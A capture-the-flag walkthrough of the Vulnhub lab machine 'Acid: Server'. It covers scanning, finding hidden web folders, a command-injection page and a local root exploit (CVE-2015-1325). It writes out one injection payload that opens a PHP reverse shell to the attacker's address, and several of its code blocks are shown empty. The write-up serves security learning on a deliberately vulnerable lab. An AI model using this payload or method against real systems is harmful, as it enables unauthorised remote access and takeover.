[Vulnhub]Acid: Server
Acid:Server is created by Avinash Kumar Thapa
More information and OVA file download please check here.
Links
watch video online:
Attacker & Target
Attacker: Kali Linux (10.1.1.130/24)
Target: Acid: Server (10.1.1.132/24)
Vulnerability & Exploit
- Hints stored in some pages' source code or title, otherwise dirbuster/wfuzz can be used to find hidden folders
- Command injection vulnerability exists in
/Challenge/Magic_Box/command.php
, exploit it can obtain a reverse shell - Apport/Ubuntu - Local Root Race Condition exploit (CVE-2015-1325) exist, exploit it to get ROOT
Method
- Scanned the network to discover the target server [arp-scan]
- Port scanned the target to discover the running services and open ports [unicornscan & nmap]
- Web information gathering and interacting with the web server [firefox]
- Brute force scan to find hidden path [dirbuster]
- Found the hidden folder and a page which has command injection vulnerability, analyse it with burp suite and exploit it to get a reverse shell
- Enumeration and found the server is vulnerable to CVE-2015-1325, exploit it to get ROOT
Tools
All the tools used here can be found in Kali Linux
Walkthrough
Using arp-scan as routine to detect the target’s IP address (10.1.1.132 in this case).
1 2 3 4 5 6 7 |
|
10.1.1.132 is our Target!
Then run uniscornscan to detect opening ports on the target (unicornscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).
1 2 3 4 5 6 7 8 9 |
|
From the result above, TCP port 33447 has been discovered.
Then I run NMAP scan to probe more detail information against the opening port.
1 2 3 4 5 6 7 |
|
I found that apache 2.4.10 is running on port 33447, and the server OS is Ubuntu Linux.
Then I start up the firefox to have a close look the web application and found hidden path from title or dirbuster scan or decode the password on the bottom of source code.
The hidden folder is /Challenge
Then I keep using dirbuster
to /Challenge/
folder and found some pages, one of them is cake.php
which again, the title give us the clue to another hidden folder /Magic_Box
Keep running dirbuster
to /Challenge/Magic_Box
folder and found interesting php page command.php
which has command injection vulnerability
Then by using burp proxy
and tamper the request to exploit command injection vulnerability to get a shell, due to there is no wget
in the target server, I use the following php command:
payload (the payload need to be URL encoded):
127.0.0.1; php -r '$sock=fsockopen("10.1.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Setting up NC
to listen on port 4444, then send the payload to server and got a reverse shell with www-data
limited privilege.
Then running some enumeration and poking around, I found the target server is Ubuntu 15.04, which is local privilege escape vulnerable to CVE-2015-1325
Compile and send the exploit to target server, then run it to get ROOT!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
|